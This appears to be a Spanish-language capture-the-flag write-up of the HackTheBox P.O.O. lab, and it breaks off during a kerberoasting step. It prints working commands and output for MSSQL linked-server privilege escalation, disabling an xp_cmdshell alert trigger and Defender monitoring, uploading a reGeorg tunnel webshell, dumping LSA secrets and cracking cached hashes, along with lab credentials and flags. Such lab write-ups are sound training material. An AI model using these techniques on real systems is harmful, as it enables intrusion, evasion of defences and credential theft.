xchg2pwn

xchg2pwn

Entusiasta del reversing y desarrollo de exploits


Contenido


HackTheBox

P.O.O.



Recon

POO{fcfb0767f5bd3cbc22f40ff5011ad555}


Iniciamos la máquina escaneando los puertos de la máquina con nmap donde encontramos solo 2 puertos abiertos entre ellos un servicio http y mssql, al lanzar scripts de reconocimiento podemos ver el dominio al que pertenece el equipo

❯ nmap -sCV 10.13.38.11
Nmap scan report for 10.13.38.11
PORT     STATE SERVICE
80/tcp   open  http
1433/tcp open  ms-sql-s
| ms-sql-ntlm-info: 
|   10.13.38.11:1433: 
|     Target_Name: POO
|     NetBIOS_Domain_Name: POO
|     NetBIOS_Computer_Name: COMPATIBILITY
|     DNS_Domain_Name: intranet.poo
|     DNS_Computer_Name: COMPATIBILITY.intranet.poo  
|     DNS_Tree_Name: intranet.poo
|_    Product_Version: 10.0.17763

Al abrir la web en el navegador nos encontramos una página por defecto de un IIS

Fuzzeando directorios y archivos en la web con wfuzz encontramos un archivo no es demasiado común .ds_store, que almacena información de donde se encuentra

❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -u http://10.13.38.11/FUZZ --hc 404 -t 100  
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.13.38.11/FUZZ
Total requests: 56293

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000003:   301        1 L      10 W       149 Ch      "images"
000000015:   301        1 L      10 W       145 Ch      "js"
000000043:   301        1 L      10 W       147 Ch      "test"
000000004:   401        29 L     100 W      1293 Ch     "admin"
000000011:   301        1 L      10 W       152 Ch      "templates"
000000012:   301        1 L      10 W       150 Ch      "plugins"
000000014:   301        1 L      10 W       149 Ch      "themes"
000000112:   301        1 L      10 W       150 Ch      "uploads"
000000391:   200        31 L     55 W       703 Ch      "."
000000231:   301        1 L      10 W       146 Ch      "dev"
000000734:   301        1 L      10 W       150 Ch      "widgets"
000001901:   301        1 L      10 W       151 Ch      "meta-inf"
000008565:   200        50 L     156 W      10244 Ch    ".ds_store"

Podemos usar ds_walk para dumpear la infomación que este contiene, encontramos varias rutas, algunas en md5 con una carpeta llamada db dentro de ellas

❯ python3 ds_walk.py -u http://10.13.38.11/
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11//admin
[!] http://10.13.38.11//dev
[!] http://10.13.38.11//iisstart.htm
[!] http://10.13.38.11//Images
[!] http://10.13.38.11//JS
[!] http://10.13.38.11//META-INF
[!] http://10.13.38.11//New folder
[!] http://10.13.38.11//New folder (2)
[!] http://10.13.38.11//Plugins
[!] http://10.13.38.11//Templates
[!] http://10.13.38.11//Themes
[!] http://10.13.38.11//Uploads
[!] http://10.13.38.11//web.config
[!] http://10.13.38.11//Widgets
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/include  
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11//Images/buttons
[!] http://10.13.38.11//Images/icons
[!] http://10.13.38.11//Images/iisstart.png
----------------------------
[!] http://10.13.38.11//JS/custom
----------------------------
[!] http://10.13.38.11//Themes/default
----------------------------
[!] http://10.13.38.11//Widgets/CalendarEvents
[!] http://10.13.38.11//Widgets/Framework
[!] http://10.13.38.11//Widgets/Menu
[!] http://10.13.38.11//Widgets/Notifications
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts/custom
[!] http://10.13.38.11//Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.

Las carpetas con nombre de hashes md5 las podemos crackear facilmente en crackstation, sin embargo esto realmente no nos servirá de absolutamente nada

Además de ello, podemos ver que el IIS acepta shortnames o nombres cortos que nos permite saber si un directorio existe solo con sus iniciales y expresiones

❯ curl -s -X OPTIONS -I 'http://10.13.38.11/ta*~1*'  
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Sun, 23 Apr 2023 17:28:37 GMT
Content-Length: 0


❯ curl -s -X OPTIONS -I 'http://10.13.38.11/te*~1*'  
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Sun, 23 Apr 2023 17:28:48 GMT
Content-Length: 1245

Usando iis_shortname_scan hacia un directorio de los 2 db, este logra encontrar un archivo el cual su nombre inicia por db_co seguido de algo y termina en .txt

❯ python3 iis_shortname_scan.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db  
Server is vulnerable, please wait, scanning...
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/p~1.*      [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/po~1.*     [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.*    [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.*   [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.*  [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t*        [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx*       [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*      [scan in progress]
[+] File /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
0 Directories, 1 Files found in total
Note that * is a wildcard, matches any character zero or more times.

Siguiendo esta lógica podemos crear un diccionario que solo tenga palabras las cuales inicien por co, ahora nos queda un diccionario de solo 1248 lineas

❯ grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt > fuzz.txt  

❯ wc -l fuzz.txt
1248 fuzz.txt

Ahora fuzzeamos esa parte del archivo con wfuzz y despues de unos segundos encontramos que connection devuelve 200, el nombre es poo_connection.txt

❯ wfuzz -c -w fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404 -t 100  
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt
'Total requests: 1248

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000097:   200        6 L      7 W        142 Ch      "connection"

Al hacer un simple curl a esa ruta encontramos la primera flag ademas de lo que parecen ser credenciales en texto claro probablemente para la base de datos

❯ curl http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt  
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#

Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}


Huh?!

POO{88d829eb39f2d11697e689d779810d42}


El puerto 1433 esta abierto, al utilizar las credenciales para mssql nos conecta

❯ impacket-mssqlclient intranet.poo/external_user:#p00Public3xt3rnalUs3r#@10.13.38.11  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.  
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL>

Listando las bases de datos, ademas de las que vienen por defecto encontramos POO_PUBLIC aunque realmente no hay nada que nos pueda ser de interes

SQL> select name from sysdatabases;  

name
----------
master
tempdb
POO_PUBLIC

SQL>

El usuario actual es external_user que fue como el que nos hemos conectado

SQL> select suser_name();  

-------------
external_user

SQL>

Los privilegios que tenemos en este servidor ahora mismo solo es conectarnos

SQL> select permission_name from fn_my_permissions(null, null);  

permission_name
---------------
CONNECT SQL

SQL>

El nombre del servidor que esta actualmente en uso es COMPATIBILITY\POO_PUBLIC

SQL> select @@servername;  

------------------------
COMPATIBILITY\POO_PUBLIC

SQL>

Sin embargo eso no quiere decir que sea el unico, listando todos los nombres de servidores disponibles encontramos el servidor COMPATIBILITY\POO_PUBLIC

SQL> select srvname from sysservers;  

srvname
------------------------
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC

SQL>

Con exec at podemos ejecutar todas las querys sql en el servidor poo_config

SQL> exec('select @@servername;') at [compatibility\poo_config];  

------------------------
COMPATIBILITY\POO_CONFIG

SQL>

Esta vez el usuario que ejecuta las querys en este servidor es internal_user

SQL> exec('select suser_name();') at [compatibility\poo_config];  

-------------
internal_user

SQL>

Sin embargo los privilegios que tenemos en el servidor poo_config son exactamente los mismos que en poo_public, solo el permiso para conectarnos

SQL> exec('select permission_name from fn_my_permissions(null, null);') at [compatibility\poo_config];  

permission_name
---------------
CONNECT SQL

SQL>

Algo a probar es desde el servidor poo_public ejecutar una query en el servidor poo_config que a su vez ejecute una query de nuevo en el servidor poo_public

SQL> exec('exec(''select @@servername;'') at [compatibility\poo_public];') at [compatibility\poo_config];  

------------------------
COMPATIBILITY\POO_PUBLIC

SQL>

Podria parecer lo mismo que ejecutar las querys directamente, sin embargo el ejecutarlas desde poo_config a poo_public este las ejecuta como el usuario sa

SQL> exec('exec(''select suser_name();'') at [compatibility\poo_public];') at [compatibility\poo_config];  

--
sa

SQL>

El usuario sa es administrador por lo que si ahora listamos los privilegios tenemos podemos hacer casi cualquier cosa ya que tenemos todos asignados

SQL> exec('exec(''select permission_name from fn_my_permissions(null, null);'') at [compatibility\poo_public];') at [compatibility\poo_config];  

-------------------------------
CONNECT SQL
SHUTDOWN
CREATE ENDPOINT
CREATE ANY DATABASE
CREATE AVAILABILITY GROUP
ALTER ANY LOGIN
ALTER ANY CREDENTIAL
ALTER ANY ENDPOINT
ALTER ANY LINKED SERVER
ALTER ANY CONNECTION
ALTER ANY DATABASE
ALTER RESOURCES
ALTER SETTINGS
ALTER TRACE
ALTER ANY AVAILABILITY GROUP
ADMINISTER BULK OPERATIONS
AUTHENTICATE SERVER
EXTERNAL ACCESS ASSEMBLY
VIEW ANY DATABASE
VIEW ANY DEFINITION
VIEW SERVER STATE
CREATE DDL EVENT NOTIFICATION
CREATE TRACE EVENT NOTIFICATION
ALTER ANY EVENT NOTIFICATION
ALTER SERVER STATE
UNSAFE ASSEMBLY
ALTER ANY SERVER AUDIT
CREATE SERVER ROLE
ALTER ANY SERVER ROLE
ALTER ANY EVENT SESSION
CONNECT ANY DATABASE
IMPERSONATE ANY LOGIN
SELECT ALL USER SECURABLES
CONTROL SERVER

SQL>

Para trabajar mas comodamente, podemos crear un usuario pwned asignandole una contraseña y añadirle a sus roles sysadmin para tener todos los privilegios

SQL> exec('exec(''create login pwned with password = ''''password123#'''';'') at [compatibility\poo_public];') at [compatibility\poo_config];  
SQL> exec('exec(''sp_addsrvrolemember ''''pwned'''', ''''sysadmin'''';'') at [compatibility\poo_public];') at [compatibility\poo_config];  
SQL>

Ahora podemos simplemente iniciar sesion con las credenciales definidas antes

❯ impacket-mssqlclient intranet.poo/pwned:password123#@10.13.38.11
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.  
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL>

Si ahora que somos administradores listamos todas las bases de datos nos encontramos con una que antes no podiamos ver, la base de datos flag

SQL> select name from sysdatabases;  

name
----------
master
tempdb
model
msdb
POO_PUBLIC
flag

SQL>

Listamos las tablas de las base de datos flag y solo encontramos una tabla flag

SQL> select name from flag.sys.tables;  

name
----
flag

SQL>

Simplemente leemos su contenido y nos devuelve una columna flag con la flag

SQL> select * from flag.dbo.flag;

flag
----------------------------------------  
b'POO{88d829eb39f2d11697e689d779810d42}'

SQL>


BackTrack

POO{4882bd2ccfd4b5318978540d9843729f}


Somos sa, deberiamos poder habilitar xp_cmdshell para ejecutar comandos, sin embargo al hacerlo nos devuelve error diciendo que se enviara una alerta

SQL> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.  
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 11: Attempt to enable xp_cmdshell detected. Database Administrators will be notified!
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 181: The transaction ended in the trigger. The batch has been aborted.
SQL>

Debido a una politica no podemos habilitar xp_cmdshell, para ver el trigger que ocasiona esto podemos listar los nombres de los server_triggers habilitados

SQL> select name from sys.server_triggers;  

name                
-----------------
ALERT_xp_cmdshell

SQL>

Podemos simplemente desactivar el trigger y podemos habilitar xp_cmdshell

SQL> disable trigger alert_xp_cmdshell on all server;
SQL> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.  
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL>

Ahora podemos ejecutar comandos en el sistema como un usuario de servicio

SQL> xp_cmdshell whoami

output
---------------------------  
nt service\mssql$poo_public

SQL>

Podriamos pensar en hacer una reverse shell sin embargo tenemos una gran limitación y es que no tenemos ningun tipo conexión hacia nuestro equipo

SQL> xp_cmdshell ping 10.10.14.10

output
----------------------------------------------------------  

Pinging 10.10.14.10 with 32 bytes of data:
General failure.
General failure.
General failure.
General failure.

Ping statistics for 10.10.14.10:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

SQL>

Enumerando el servidor en la carpeta wwwroot donde esta montada la web encontramos un archivo web.config que puede contener algo interesante

SQL> xp_cmdshell dir C:\inetpub\wwwroot

output
-----------------------------------------------------  

 Volume in drive C has no label.
 Volume Serial Number is F661-7669

 Directory of C:\inetpub\wwwroot

04/05/2023  05:24 AM    <DIR>          .
04/05/2023  05:24 AM    <DIR>          ..
02/19/2018  02:15 PM            10,244 .DS_Store
03/17/2018  12:56 PM    <DIR>          .Trashes
04/05/2023  05:40 AM    <DIR>          admin
03/17/2018  12:56 PM    <DIR>          dev
12/13/2019  04:58 AM               703 iisstart.htm
12/13/2019  04:58 AM            99,710 iisstart.png
03/17/2018  12:56 PM    <DIR>          Images
03/17/2018  12:56 PM    <DIR>          JS
03/17/2018  12:56 PM    <DIR>          META-INF
03/17/2018  12:56 PM    <DIR>          New folder
03/17/2018  12:56 PM    <DIR>          New folder (2)
03/17/2018  12:57 PM    <DIR>          Plugins
03/17/2018  12:57 PM    <DIR>          Templates
04/05/2023  05:24 AM    <DIR>          test
03/17/2018  12:57 PM    <DIR>          Themes
03/17/2018  12:57 PM    <DIR>          Uploads
04/04/2018  12:24 PM               728 web.config
03/17/2018  12:57 PM    <DIR>          Widgets

               4 File(s)        111,385 bytes
              16 Dir(s)   6,624,051,200 bytes free

SQL>

Al intentar leerlo nos encontramos con que el usuario no tiene permisos para hacerlo

SQL> xp_cmdshell type C:\inetpub\wwwroot\web.config  

output
-----------------
Access is denied.

SQL>

Hay otras formas de ejecutar comandos, usando sp_execute_external_script podemos ejecutar con python un comando en el sistema ahora como poo_public01

SQL> sp_execute_external_script @language=N'python', @script=N'import os; os.system("whoami")';  
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:

compatibility\poo_public01

Express Edition will continue to be enforced.
SQL>

Este usuario si que tiene privilegios para leerlo, vemos una estructura en xml, y en un comentario tiene credenciales para autenticarnos en la web contra /admin

SQL> sp_execute_external_script @language=N'python', @script=N'import os; os.system("type C:\inetpub\wwwroot\web.config")';  
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <staticContent>
            <mimeMap
                fileExtension=".DS_Store"
                mimeType="application/octet-stream"
            />
        </staticContent>
        <!--
        <authentication mode="Forms">
            <forms name="login" loginUrl="/admin">
                <credentials passwordFormat = "Clear">
                    <user
                        name="Administrator"
                        password="EverybodyWantsToWorkAtP.O.O."
                    />
                </credentials>
            </forms>
        </authentication>
        -->
    </system.webServer>
</configuration>

Express Edition will continue to be enforced.

SQL>

Hacemos una simple petición con curl hacia el directorio /admin indicando las credenciales con el parametro -u, en la respuesta nos encontramos con la flag

❯ curl http:/10.13.38.11/admin/ -u Administrator:EverybodyWantsToWorkAtP.O.O.  
"I can't go back to yesterday, because i was a different person then..."  
- Alice in Wonderland
Flag : POO{4882bd2ccfd4b5318978540d9843729f}


Foothold

POO{ff87c4fe10e2ef096f9a96a01c646f8f}


Vamos la forma intencionada, con ipconfig podemos ver la Ipv6 de la máquina

SQL> xp_cmdshell ipconfig

output
--------------------------------------------------------------------  

Windows IP Configuration

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.20.128.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::21
   IPv6 Address. . . . . . . . . . . : dead:beef::1001
   IPv6 Address. . . . . . . . . . . : dead:beef::c2b:31da:7f3e:8a1d  
   Link-local IPv6 Address . . . . . : fe80::c2b:31da:7f3e:8a1d%5
   IPv4 Address. . . . . . . . . . . : 10.13.38.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:feb9:deb9%5
                                       10.13.38.2

SQL> xp_cmdshell hostname

output
-------------
COMPATIBILITY

SQL>

Al hacer un escaneo nuevamente con nmap esta vez por Ipv6 encontramos el puerto 5985 que es winrm el cual con credenciales nos permite obtener una shell

❯ nmap --min-rate 5000 -p- -6 dead:beef::1001  
Nmap scan report for dead:beef::1001
PORT     STATE SERVICE
80/tcp   open  http
1433/tcp open  ms-sql-s
5985/tcp open  wsman

Para trabajar mas comodos la agregaremos al /etc/hosts con el hostname

❯ echo 'dead:beef::1001 compatibility' | sudo tee -a /etc/hosts

Antes habiamos encontrado credenciales para la web en /admin, al reutilizarlas con crackmapexec hacia winrm nos devuelve Pwn3d!, significa que son validas

❯ crackmapexec winrm compatibility -u Administrator -p EverybodyWantsToWorkAtP.O.O.
SMB         compatibility   5985   NONE             [*] None (name:compatibility) (domain:None)
HTTP        compatibility   5985   NONE             [*] http://compatibility:5985/wsman
WINRM       compatibility   5985   NONE             [+] None\Administrator:EverybodyWantsToWorkAtP.O.O. (Pwn3d!)

Podemos simplemente usar evil-winrm para conectarnos como Administrador y conseguir una powershell en la maquina perteneciente al hostname compatibility

❯ evil-winrm -i compatibility -u Administrator -p EverybodyWantsToWorkAtP.O.O.  
PS C:\Users\Administrator\Documents> whoami
compatibility\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}
PS C:\Users\Administrator\Documents>


p00ned

POO{1196ef8bc523f084ad1732a38a0851d6}


Podemos crear un proxy mediante la web usando reGeorg, pero antes de esto deshabilitaremos la busqueda de virus para evitar problemas con el script

PS C:\Users\Administrator\Documents> Set-MpPreference -DisableRealtimeMonitoring $true  
PS C:\Users\Administrator\Documents>

Ahora subimos el tunnel.aspx en el directorio wwwroot donde esta montada la web

PS C:\inetpub\wwwroot> upload tunnel.aspx

Info: Uploading tunnel.aspx to C:\inetpub\wwwroot\tunnel.aspx  

Data: 6612 bytes of 6612 bytes copied

Info: Upload successful!

PS C:\inetpub\wwwroot>

Por defecto la web no ejecuta aspx pero podemos instalar la extension facilmente

PS C:\inetpub\wwwroot> dism /online /enable-feature /all /featurename:IIS-ASPNET45  

Deployment Image Servicing and Management tool
Version: 10.0.17763.771

Image Version: 10.0.17763.914

Enabling feature(s)

[==========================100.0%==========================]

The operation completed successfully.

PS C:\inetpub\wwwroot>

Ahora desde nuestro equipo ejecutamos el script de reGeorg con python2 para conectarnos al archivo aspx en la web y crear un proxy indicando el puerto 1080

❯ python2 reGeorgSocksProxy.py -p 1080 -u http://10.13.38.11/tunnel.aspx
                     _____
  _____   ______  __|___  |__  ______  _____  _____   ______
 |     | |   ___||   ___|    ||   ___|/     \|     | |   ___|
 |     \ |   ___||   |  |    ||   ___||     ||     \ |   |  |
 |__|\__\|______||______|  __||______|\_____/|__|\__\|______|
                    |_____|
                    ... every office needs a tool like Georg

  willem@sensepost.com / @_w_m__
  sam@sensepost.com / @trowalts
  etienne@sensepost.com / @kamp_staaldraad

[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:1080], tunnel at [http://10.13.38.11/tunnel.aspx]  
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'

Desde la máquina podemos hacer un ping al DC para poder ver su dirección Ipv4

PS C:\Users\Administrator\Documents> ping dc

Pinging DC.intranet.poo [172.20.128.53] with 32 bytes of data:  
Reply from 172.20.128.53: bytes=32 time<1ms TTL=128
Reply from 172.20.128.53: bytes=32 time<1ms TTL=128
Reply from 172.20.128.53: bytes=32 time<1ms TTL=128
Reply from 172.20.128.53: bytes=32 time<1ms TTL=128

Ping statistics for 172.20.128.53:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

PS C:\Users\Administrator\Documents>

Para trabajar mas comodamente agregaremos el dominio y los hostnames de las 2 maquinas que sabemos que existen al /etc/hosts para que sepa donde resolver

❯ tail -n2 /etc/hosts
172.20.128.53 intranet.poo dc.intranet.poo  
172.20.128.101 compatibility.intranet.poo

Como somos administradores locales podemos dumpear los secretos lsa, al hacerlo encontramos 2 hashes que pertenecen a los usuarios p00_dev y p00_adm

❯ proxychains -q crackmapexec smb compatibility.intranet.poo -u Administrator -p EverybodyWantsToWorkAtP.O.O. --local-auth --lsa
SMB         compatibility.intranet.poo 445    COMPATIBILITY    [*] Windows Server 2019 Standard 17763 x64 (name:COMPATIBILITY) (domain:COMPATIBILITY) (signing:False) (SMBv1:True)
SMB         compatibility.intranet.poo 445    COMPATIBILITY    [+] COMPATIBILITY\Administrator:EverybodyWantsToWorkAtP.O.O. (Pwn3d!)
SMB         compatibility.intranet.poo 445    COMPATIBILITY    [+] Dumping LSA secrets
SMB         compatibility.intranet.poo 445    COMPATIBILITY    INTRANET.POO/p00_dev:$DCC2$10240#p00_dev#7afecfd48f35f666ae9f6edd53506d0c: (2018-03-22 15:45:01)
SMB         compatibility.intranet.poo 445    COMPATIBILITY    INTRANET.POO/p00_adm:$DCC2$10240#p00_adm#32c28e9a78d7c3e7d2f84cbfcabebeed: (2018-03-22 12:36:34)
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:aes256-cts-hmac-sha1-96:edf47cf46722c46d053fc55b21363683379245aef29bb438cf3913f74bad370d
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:aes128-cts-hmac-sha1-96:73cb8d33d34f3a3033e9677c32bfd8c2
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:des-cbc-md5:86b558e3a75df8ec
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:plain_password_hex:f752808d2fddd51b9592a4a7bebf36cb259411db659710089dcb2e18bea0070c79789a023eeeb5383b42b7a8943561d861dbd057ffe52f37a9531e5363abcaf7ec7a1a7b7db2703ba0fccca05f931362a18bfd93463b2a4b02c577a1b602404be60b4f124569d64195961eaaa78a69b414136907dc2ef90c3dd9196391f97e7e890b6331793dc7680a323dc16298663389ee53cbb6f1473f3d8d2de65ea5e372dcb790c5125bf6524ad2b6090ded3162a3b8e7ac13d7d3c0ab6f7107d908717dbca075fe58bf573556bd0e36215cd2f5a80ae2019ea10ced1f865b6e0e61fb8bc9398ffe6a275e7e00aca20f0da2d62e  
SMB         compatibility.intranet.poo 445    COMPATIBILITY    POO\COMPATIBILITY$:aad3b435b51404eeaad3b435b51404ee:f01ea0e3b625736fa3e0175d34593627:::
SMB         compatibility.intranet.poo 445    COMPATIBILITY    dpapi_machinekey:0x51d4bc23be8a2d1b3a3e2df21798f0c9b7d20e2b
dpapi_userkey:0x0684deff7ff5a560ba47a88f3d83ff2904dda1e1
SMB         compatibility.intranet.poo 445    COMPATIBILITY    NL$KM:994f5d6c55b9ecb50c0bd875a28893e4c0d9efc50db9405792399abe9da583ed11cb717cab32cd11fd7aed2eabbef16258f21d8aac9facfb3217d8eeb3bda5dc

Para obtener la contraseña de p00_dev podemos usar el rockyou.txt para aplicar fuerza bruta con john sin embargo sera necesario agregar el parametro --rules

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashes --rules:d3ad0ne
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (mscash2, MS Cache Hash 2 (DCC2) [PBKDF2-SHA1 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
Development1!    (INTRANET.POO/p00_dev)
Use the "--show --format=mscash2" options to display all of the cracked passwords reliably
Session completed.

Aunque esto no es igual para p00_adm, ya que sera necesario usar otro diccionario, en este caso lo conseguimos usando Keyboard-Combinations.txt de seclists

❯ john -w:/usr/share/seclists/Passwords/Keyboard-Combinations.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (mscash2, MS Cache Hash 2 (DCC2) [PBKDF2-SHA1 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
ZQ!zaq1          (INTRANET.POO/p00_adm)
Use the "--show --format=mscash2" options to display all of the cracked passwords reliably
Session completed.

Al comprobar las credenciales a nivel de dominio hacia el DC solo son validas las de p00_dev, aunque de primeras no nos aporta nada realmente interesante

❯ proxychains -q crackmapexec smb intranet.poo -u p00_dev -p Development1!
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [+] intranet.poo\p00_dev:Development1! 

❯ proxychains -q crackmapexec smb intranet.poo -u p00_adm -p 'ZQ!zaq1'
SMB         intranet.poo    445    DC               [*] Windows Server 2016 Standard 14393 x64 (name:DC) (domain:intranet.poo) (signing:True) (SMBv1:True)  
SMB         intranet.poo    445    DC               [-] intranet.poo\p00_adm:ZQ!zaq1 STATUS_LOGON_FAILURE

Para enumerar el dominio podemos hacerlo con bloodhound usando las credenciales del usuario p00_dev, toda la informacion la guardaremoz en un comprimido zip

❯ proxychains -q bloodhound-python -u p00_dev -p Development1! -ns 172.20.128.53 -d intranet.poo -c All --zip --dns-tcp  
INFO: Found AD domain: intranet.poo
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC.intranet.poo
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: DC.intranet.poo
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: COMPATIBILITY.intranet.poo
INFO: Querying computer: DC.intranet.poo
INFO: Done in 01M 07S
INFO: Compressing output into 20230928143853_bloodhound.zip

Subimos el zip a bloodhound y listando todas las cuentas kerberoasteables encontramos 2 interesantes, los usuarios p00_hr y p00_adm son vulnerables

Tenemos credenciales validas a nivel de dominio asi que con GetUserSPNs podemos aplicar un kerberoasting y obtener los hashes de las 2 cuentas vulnerables

❯ proxychains -q impacket-GetUserSPNs intranet.poo/p00_dev:Development1! -request -dc-ip intranet.poo
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName             Name     MemberOf                                      PasswordLastSet             LastLogon                   Delegation 
-------------------------------  -------  --------------------------------------------  --------------------------  --------------------------  ----------
HR_peoplesoft/intranet.poo:1433  p00_hr                                                 2018-05-10 22:32:09.135381  <never>                                
